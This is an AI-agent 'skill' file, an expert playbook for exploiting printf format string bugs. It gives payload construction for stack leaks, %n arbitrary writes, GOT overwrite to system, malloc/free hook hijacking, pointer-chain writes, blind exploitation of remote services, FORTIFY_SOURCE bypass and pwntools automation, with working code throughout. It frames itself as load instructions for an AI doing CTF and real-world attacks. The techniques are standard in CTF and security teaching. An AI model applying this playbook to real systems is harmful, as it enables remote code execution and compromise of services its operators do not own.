SKILL: Format String Exploitation — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget that 64-bit addresses must be placed after the format specifiers.

0. RELATED ROUTING

stack-overflow-and-rop — combine format string leak with stack overflow for full exploit
binary-protection-bypass — format string is the primary canary/PIE/ASLR leak method
arbitrary-write-to-rce — convert format string write primitive to code execution targets
heap-exploitation — heap address leak via format string for heap exploitation

1. VULNERABILITY IDENTIFICATION

Vulnerable Pattern

printf(user_input);          // VULNERABLE: user controls format string
fprintf(fp, user_input);     // VULNERABLE
sprintf(buf, user_input);    // VULNERABLE
snprintf(buf, sz, user_input); // VULNERABLE

printf("%s", user_input);    // SAFE: format string is fixed

Quick Test

Input: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p
If the output shows stack values (hex addresses), the format string bug is confirmed
Look for 0x4141414141414141 (64-bit) or 0x41414141 (32-bit) in the output to find your input offset

2. READING MEMORY

Stack Leak (%p)

Format	Action	Use
`%p`	Print next stack value as pointer	Sequential stack dump
`%N$p`	Print N-th parameter as pointer	Direct positional access
`%N$lx`	Print N-th parameter as a 64-bit hex number (no `0x` prefix; zero prints as `0`, not `(nil)`)	Easier to parse
`%N$s`	Dereference N-th parameter as string pointer	Read memory at pointer value

Finding Your Input Offset

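# Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
# Output: AAAAAAAA.0x7ffd12340000.(nil).(nil).0x7f1234567890.0x1.0x4141414141414141...
#         the 6th value echoes the input, so offset = 6 (example)
# Or automated (io is an already-connected pwntools tube; the target must
# accept one input per loop iteration, otherwise reconnect each time):
for i in range(1, 30):
    io.sendline(f'AAAAAAAA%{i}$p'.encode())     # 8 marker bytes fill one 64-bit slot
    if b'0x4141414141414141' in io.recvline():  # recvline() returns bytes
        print(f'Offset = {i}')
        break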
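The manual reading of the `%p` dump can also be done offline on a captured response. The following is a minimal sketch, assuming the probe used `.`-separated `%p` specifiers as in the example above. `find_input_offset` is a hypothetical helper and the sample bytes are made up for illustration.

```python
def find_input_offset(response: bytes, marker: bytes = b"A" * 8):
    """Return the 1-based %p position that echoes `marker`, or None.

    Assumes the probe looked like b"AAAAAAAA.%p.%p.%p..." so the response
    is the echoed marker followed by '.'-separated pointer values.
    """
    # Little-endian read of the marker bytes, formatted the way %p prints it.
    wanted = hex(int.from_bytes(marker, "little")).encode()
    fields = response.strip().split(b".")
    # fields[0] is the echoed marker itself; fields[1] is the first %p.
    for position, field in enumerate(fields[1:], start=1):
        if field == wanted:
            return position
    return None


# Illustrative response only (values are made up).
sample = b"AAAAAAAA.0x7ffd12340000.(nil).(nil).0x7f1234567890.0x1.0x4141414141414141"
offset = find_input_offset(sample)
print(offset)
```

For a 32-bit target, passing `marker=b"AAAA"` makes the helper look for `0x41414141` instead.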

Leaking Specific Values

Target	Method	Stack Position
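Canary	`%N$p` where N = canary offset from format string	Typically at input offset + buf_size/8, plus a few slots of padding
Saved RBP	`%N$p` (the slot just before the return address)	Leaks a stack address; other stack locations sit at fixed offsets from it
Return address	`%N$p`	Leaks a .text address (PIE base = leak - offset of the return site in the binary; the result must be page-aligned)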
Libc address	`%N$p` where N points to `__libc_start_main+XX` return on stack	libc base = leak - offset
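The base calculations in the table reduce to one subtraction plus an alignment check. A minimal sketch follows; `base_from_leak` is a hypothetical helper, and both numbers are invented for illustration rather than taken from a real binary.

```python
PAGE_MASK = 0xFFF


def base_from_leak(leak: int, known_offset: int) -> int:
    """Subtract the leaked location's offset and sanity-check page alignment."""
    base = leak - known_offset
    if base & PAGE_MASK:
        raise ValueError(f"base {base:#x} is not page-aligned; wrong offset or leak")
    return base


# Hypothetical values for illustration only.
leaked_ret = 0x55D4C3A01234   # return address read with %N$p
ret_site_offset = 0x1234      # offset of that return site inside the binary
pie_base = base_from_leak(leaked_ret, ret_site_offset)
print(hex(pie_base))
```

The same helper applies to libc: pass the leaked `__libc_start_main` return address and its offset inside the libc build in use.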

Reading Arbitrary Address (%s)

# 32-bit: place address at start of format string
payload = p32(target_addr) + b'%N$s'  # N = offset where target_addr appears on stack

# 64-bit: address contains null bytes → place AFTER format specifiers
# Example assumes the input starts at offset 7: the 8-byte block b'%8$sAAAA'
# fills offset 7, so the address lands at offset 8
payload = b'%8$sAAAA' + p64(target_addr)
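The positional index in the 64-bit case depends on how many 8-byte slots the specifier itself occupies. The sketch below computes it with the standard library only. `build_read_payload` is a hypothetical helper, and the input offset and address are assumed values.

```python
import struct


def build_read_payload(input_offset: int, target_addr: int, word: int = 8) -> bytes:
    """Build b'%K$s' + padding + packed address for a 64-bit target.

    input_offset is the positional index at which the start of the buffer
    appears. The address is placed right after the padded specifier, so its
    index K is input_offset + (padded specifier length // word).
    """
    slots = 1
    while True:
        index = input_offset + slots
        spec = f"%{index}$s".encode()
        if len(spec) <= slots * word:
            break
        slots += 1  # specifier did not fit; reserve another word
    padded = spec.ljust(slots * word, b"A")
    return padded + struct.pack("<Q", target_addr)


# Assumed values: input at offset 6, hypothetical GOT address 0x404018.
payload = build_read_payload(input_offset=6, target_addr=0x404018)
print(payload)
```

The padding bytes are printed after the leaked string, so the response has to be split on them when parsing. `%s` also stops at the first null byte in the target memory.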

3. WRITING MEMORY (%n)

Write Specifiers

Specifier	Bytes Written	Value Written
`%n`	4 bytes (int)	Characters printed so far
`%hn`	2 bytes (short)	Characters printed so far (mod 0x10000)
`%hhn`	1 byte (char)	Characters printed so far (mod 0x100)
`%ln`	8 bytes (long, on 64-bit Linux)	Characters printed so far
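The truncation behaviour in the table can be modelled in a few lines. This is a sketch of the arithmetic only, assuming a little-endian LP64 target; `stored_bytes` is a hypothetical helper, not a library function.

```python
# Store width in bytes for each specifier (LP64 assumed, so long is 8 bytes).
STORE_WIDTH = {"%hhn": 1, "%hn": 2, "%n": 4, "%ln": 8}


def stored_bytes(specifier: str, printed: int) -> bytes:
    """Bytes written to memory when `printed` characters have been output."""
    width = STORE_WIDTH[specifier]
    # The count is truncated to the store width, then written little-endian.
    return (printed % (1 << (8 * width))).to_bytes(width, "little")


for spec in STORE_WIDTH:
    print(spec, stored_bytes(spec, 0x12345).hex())
```

The narrower specifiers leave the neighbouring bytes untouched, which is why multi-part writes with `%hn` or `%hhn` are preferred over a single `%n` with a huge padding count.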

Arbitrary Write Technique

Goal: Write value V to address A.

32-bit (address on stack directly):

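# Write 2 bytes at a time using %hn
# Assumes: from pwn import p32; target_addr, value and offset are already known
# Place target addresses in format string (they'll be on stack)
payload  = p32(target_addr)       # for low 2 bytes
payload += p32(target_addr + 2)   # for high 2 bytes
# Calculate padding for each %hn write (8 bytes of addresses already printed)
low = value & 0xffff
high = (value >> 16) & 0xffff
# Note: omit a %c whose padding works out to 0, because %0c still prints one character
payload += f'%{(low - 8) & 0xffff}c%{offset}$hn'.encode()
payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode()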

64-bit (address AFTER format string):

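# Addresses contain null bytes (0x00007fXXXXXXXXXX), and printf stops parsing at the first one
# Solution: place addresses AFTER the format specifiers

# Step 1: format string portion (no null bytes)
# X, Y = padding counts; N, M = offsets of the two appended addresses,
# i.e. N = input offset + align // 8 and M = N + 1
fmt = b'%Xc%N$hn%Yc%M$hn'
# Step 2: pad to 8-byte alignment (align = len(fmt) rounded up to a multiple of 8)
fmt = fmt.ljust(align, b'A')
# Step 3: append target addresses
fmt += p64(target_addr)
fmt += p64(target_addr + 2)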
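The template above leaves the padding counts and positional indices as placeholders. One way to fill them in is sketched below with the standard library only. `build_hn_write` is a hypothetical helper that writes just the low 32 bits of the value, and the offset, address and value are assumed for illustration.

```python
import struct


def build_hn_write(input_offset: int, target_addr: int, value: int) -> bytes:
    """Write the low 32 bits of `value` at target_addr using two %hn writes."""
    # (half, which): `which` selects target_addr (0) or target_addr + 2 (1).
    halves = [(value & 0xFFFF, 0), ((value >> 16) & 0xFFFF, 1)]
    halves.sort()  # ascending counts keep every padding non-negative
    slots = 1      # 8-byte words reserved for the specifier portion
    while True:
        fmt, printed = b"", 0
        for half, which in halves:
            pad = (half - printed) % 0x10000
            if pad:  # "%0c" would still emit one character, so skip it
                fmt += f"%{pad}c".encode()
                printed += pad
            fmt += f"%{input_offset + slots + which}$hn".encode()
        if len(fmt) <= slots * 8:
            break
        slots += 1  # indices shift when the specifier portion grows
    fmt = fmt.ljust(slots * 8, b"A")  # filler is printed after both writes
    return fmt + struct.pack("<QQ", target_addr, target_addr + 2)


# Assumed values: input at offset 6, hypothetical address and value.
payload = build_hn_write(input_offset=6, target_addr=0x404018, value=0x401196)
print(payload[:24])
```

The loop is needed because the positional indices depend on the padded length of the specifier portion, which in turn depends on how many digits the indices have. Overwriting a full libc pointer would take a third `%hn` for bits 32 to 47.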

Byte-by-Byte Write with %hhn

Write one byte at a time for precision (6 writes for full 48-bit address on 64-bit):

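# Per-byte view of the value, lowest byte first (what each %hhn will store)
byte_values = [(value >> (i * 8)) & 0xff for i in range(6)]

# pwntools handles the math. Pass the whole value in one entry: integer values
# are packed to the full word size set by context, so separate per-byte integer
# entries at target_addr + i would overlap each other.
from pwn import context, fmtstr_payload
context.arch = 'amd64'
payload = fmtstr_payload(offset, {target_addr: value}, numbwritten=0, write_size='byte')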
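The padding arithmetic that a byte-wise write relies on is shown below without pwntools. It is a sketch under the assumption that writes are emitted in address order and that the printed count wraps modulo 0x100 for `%hhn`. `plan_hhn_writes` is a hypothetical helper and the address and value are made up.

```python
def plan_hhn_writes(target_addr: int, value: int, nbytes: int = 6,
                    already_printed: int = 0):
    """Return [(address, byte, padding)] in emission order for %hhn writes."""
    targets = [(target_addr + i, (value >> (8 * i)) & 0xFF) for i in range(nbytes)]
    plan, printed = [], already_printed
    for address, byte in targets:
        # Characters to print before this %hhn so that printed % 0x100 == byte.
        # A padding of 0 means the %c must be omitted entirely.
        pad = (byte - printed) % 0x100
        plan.append((address, byte, pad))
        printed += pad
    return plan


# Hypothetical target address and libc-style value.
plan = plan_hhn_writes(0x404018, 0x7F1234567890)
for address, byte, pad in plan:
    print(hex(address), hex(byte), pad)
```

Because the count only ever increases, a byte smaller than the previous one costs up to 255 extra characters. Sorting the writes by byte value shortens the output but needs the address order tracked separately.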

4. PWNTOOLS fmtstr_payload()

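from pwn import *

# Assumes elf = ELF(...) and libc = ELF(...) are loaded and libc.address has
# been set from a leak, so libc.symbols['system'] is an absolute address
context.binary = elf           # sets arch/bits so addresses are packed correctly

# Overwrite GOT entry with target address
payload = fmtstr_payload(
    offset,                    # stack offset where input appears
    {elf.got['printf']: libc.symbols['system']},  # {addr: value}
    numbwritten=0,             # bytes already output before our input
    write_size='short'         # 'byte', 'short', or 'int'
)

# For 64-bit targets, fmtstr_payload places the addresses after the
# format specifiers automatically once context is set as above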

FmtStr Class (Interactive Exploitation)

from pwn import *

def send_payload(payload):
    io.sendline(payload)
    return io.recvline()

fmt = FmtStr(execute_fmt=send_payload)
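# fmt.offset is auto-detected by sending probe payloads through send_payload,
# so the target must accept repeated inputs on the same connection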
fmt.write(elf.got['printf'], libc.symbols['system'])
fmt.execute_writes()

5. GOT OVERWRITE VIA FORMAT STRING

Common Targets

Overwrite	With	Trigger
`printf@GOT`	`system`	Next `printf(user_input)` → `system(user_input)`, send `/bin/sh`
`strlen@GOT`	`system`	If `strlen(user_input)` called
`puts@GOT`	`system`	If `puts(user_input)` called
`atoi@GOT`	`system`	If `atoi(user_input)` called (send `sh` as "number")
`__stack_chk_fail@GOT`	Controlled addr	A corrupted canary now calls the controlled address instead of aborting
`exit@GOT`	`main`	Create infinite loop for multi-shot exploit

Hook Targets (glibc < 2.34)

Target	Overwrite With	Trigger
`__malloc_hook`	one_gadget addr	A `printf` with a very large field width (e.g. `%100000c`) → internal `malloc`
`__free_hook`	`system`	`free()` of a chunk whose contents start with `/bin/sh`

6. STACK POINTER CHAIN EXPLOITATION

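When the format string is not on the stack (e.g., stored in a heap buffer referenced by a stack pointer), its bytes never appear as printf arguments, so target addresses cannot be planted directly. Use pointer chains that already exist on the stack to achieve arbitrary write.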

Two-Stage Write

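Stack:
  [offset A] → ptr_X (a stack address that points to the slot at offset B)
  [offset B] → ptr_Y (the value ptr_X points to; this is what gets rewritten)

Stage 1: Use %A$hn to write through ptr_X → the low bytes of the slot at offset B change, so that slot now holds target_addr
Stage 2: Use %B$n to write through the modified slot at offset B → writes to target_addr

With a single %hn in stage 1, target_addr must share its upper bytes with ptr_Y. The two stages normally go in separate printf calls, because glibc reads all positional arguments before it performs any write. This requires finding existing pointer chains on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp).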

Finding Pointer Chains

# Leak stack with %p, look for:
# 1. A slot at offset N whose value is a stack address A
# 2. A slot at offset M that lives at address A and itself holds a pointer B
# Use %N$hn to write through A, which rewrites the low bytes of B (the value in slot M)
# Then use %M$hn to write through the rewritten B to the target
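The indirection is easy to get backwards, so here is a toy simulation of the two stages. It models memory as a Python dict and `%hn` as a 16-bit store through the pointer held in a slot. All addresses are invented, and `write_hn` is a hypothetical model, not an exploit primitive.

```python
def write_hn(memory: dict, pointer: int, count: int) -> None:
    """Model %hn: store the low 16 bits of `count` at address `pointer`."""
    old = memory.get(pointer, 0)
    memory[pointer] = (old & ~0xFFFF) | (count & 0xFFFF)


# Toy memory model: address -> 8-byte value. All addresses are made up.
SLOT_A = 0x7FFD00001000   # stack slot read by positional offset A
SLOT_B = 0x7FFD00001040   # stack slot read by positional offset B
memory = {
    SLOT_A: SLOT_B,            # slot A holds a pointer to slot B
    SLOT_B: 0x7FFD00001080,    # slot B holds some other stack pointer
}

# Stage 1 (first printf): %A$hn writes through the pointer in slot A,
# which changes the low 2 bytes of the value stored in slot B.
write_hn(memory, memory[SLOT_A], 0x10C8)
target = memory[SLOT_B]

# Stage 2 (second printf): %B$hn writes through the pointer now in slot B.
write_hn(memory, memory[SLOT_B], 0xBEEF)
print(hex(target), hex(memory[target]))
```

Slot A itself never changes. Only the value in slot B is redirected, and only within the range reachable by changing its low 16 bits.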

7. BLIND FORMAT STRING

Remote service, no binary, no source — exploit format string blind.

Methodology

Step	Action	Purpose
1	Send `%p` × 50	Dump stack, identify address patterns
2	Identify offsets	Find libc addrs (0x7f...), stack addrs (0x7ff...), code addrs (0x55.../0x56... with PIE, 0x40... without)
3	Find input offset	Send `AAAAAAAA%N$p` for N=1..50, find 0x4141414141414141 (32-bit: `AAAA`, 0x41414141)
4	Identify binary base	Code addresses reveal PIE base (or fixed base if no PIE)
5	Leak GOT entries	If binary base known, read GOT via `%N$s` with GOT address
6	Calculate libc base	GOT value - libc symbol offset
7	Overwrite GOT	`%n` to rewrite GOT entry with system address
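Step 2 of the methodology can be roughed out with a small classifier. The ranges below are common Linux x86-64 heuristics, not guarantees. `classify_pointer` and `parse_leaks` are hypothetical helpers, and the sample dump is invented.

```python
def classify_pointer(value: int) -> str:
    """Rough guess at what a leaked 64-bit value is (Linux x86-64 heuristics)."""
    if value == 0:
        return "null"
    if value >> 36 == 0x7FF:
        return "stack"
    if value >> 40 == 0x7F:
        return "libc/mmap"
    if value >> 40 in (0x55, 0x56):
        return "PIE binary or heap"
    if 0x400000 <= value < 0x500000:
        return "non-PIE binary"
    return "other"


def parse_leaks(response: bytes) -> list:
    """Parse a '.'-separated %p dump; glibc prints (nil) for a null pointer."""
    values = []
    for field in response.strip().split(b"."):
        values.append(0 if field == b"(nil)" else int(field.decode(), 16))
    return values


# Invented dump for illustration.
sample = b"0x7ffd12340000.(nil).0x7f1234567890.0x55d4c3a01234.0x401136.0x1"
labels = [classify_pointer(v) for v in parse_leaks(sample)]
for position, label in enumerate(labels, start=1):
    print(position, label)
```

The printed position is the `%N$p` index to reuse in later steps, provided the dump started at the first `%p`.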

8. FORTIFY_SOURCE BYPASS

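FORTIFY_SOURCE (gcc -D_FORTIFY_SOURCE=2, with optimization enabled) replaces printf with __printf_chk. In glibc, __printf_chk aborts on %n when the format string lives in writable memory, and rejects positional arguments that leave gaps (%N$ used without 1..N-1). Reads with non-positional specifiers (%p%p%p...) are unaffected.

Bypass Techniques

Method	Detail
Use `%hn` sequentially (no positional)	Print exact byte count, `%hn`, adjust, `%hn`. Fragile, and only viable where the `%n` check does not fire, since that check also covers non-positional `%n` in writable format strings
Stack-based exploit	If format string is on stack, use non-positional `%n` with stack position control; subject to the same `%n` check
Heap overflow instead	FORTIFY only checks calls where the compiler knows the buffer size, so combine with a heap bug
Return-to-printf	ROP to call unfortified `printf` (if available in binary or libc)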

9. 64-BIT CONSIDERATIONS

Challenge	Solution
Addresses contain `\x00` (null byte terminates format string)	Place addresses AFTER format specifiers, pad to alignment
Address width: 6 significant bytes	Write 3 × `%hn` (2 bytes each) or 6 × `%hhn`
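Larger stack offset range	Offsets 1-5 read registers (rsi, rdx, rcx, r8, r9); stack slots start at offset 6, so input appears at offset 6 or later
48-bit address space	User-space addresses use only the low 48 bits, so the top 2 bytes are zero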

Layout Template (64-bit)

[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
 ← no null bytes here →                          ← null bytes OK (after fmt) →

10. DECISION TREE

Format string vulnerability confirmed (printf(user_input))
├── FORTIFY_SOURCE enabled? (__printf_chk)
│   ├── YES → positional %n blocked
│   │   ├── Sequential %n possible? → non-positional write
│   │   └── Combine with another primitive (heap, ROP)
│   └── NO → full positional %n available
├── What do you need first?
│   ├── Leak canary → %N$p at canary stack offset
│   ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset
│   ├── Leak libc base → %N$p at __libc_start_main return on stack
│   ├── Leak heap base → %N$p at heap pointer on stack
│   └── Leak specific address → %N$s with target address on stack
├── Architecture?
│   ├── 32-bit → addresses at start of format string
│   └── 64-bit → addresses after format string (null byte issue)
├── Write target?
│   ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)
│   ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)
│   ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE structures, __exit_funcs, tls_dtor_list
│   └── Stack return address → direct overwrite (if ASLR bypassed)
├── Single-shot or multi-shot?
│   ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains
│   └── One-shot → fmtstr_payload() with all writes in single payload
└── Input not on stack? (heap buffer)
    └── Use stack pointer chains for indirect writes
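The "Write target?" branch of the tree can be written down as a small lookup. This sketch only restates the tree. `choose_write_target` is a hypothetical helper, and the RELRO labels and version tuple are assumed input conventions.

```python
def choose_write_target(relro: str, glibc_version: tuple) -> str:
    """Map RELRO level and glibc version to the write target from the tree.

    relro is one of "none", "partial", "full"; glibc_version is (major, minor).
    """
    if relro in ("none", "partial"):
        return "GOT entry"
    if glibc_version < (2, 34):
        return "__malloc_hook or __free_hook"
    return "_IO_FILE, exit_funcs, or TLS_dtor_list"


print(choose_write_target("partial", (2, 35)))
print(choose_write_target("full", (2, 31)))
print(choose_write_target("full", (2, 35)))
```

A stack return address remains an option in every branch once a stack leak is available, so it is left out of the lookup.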
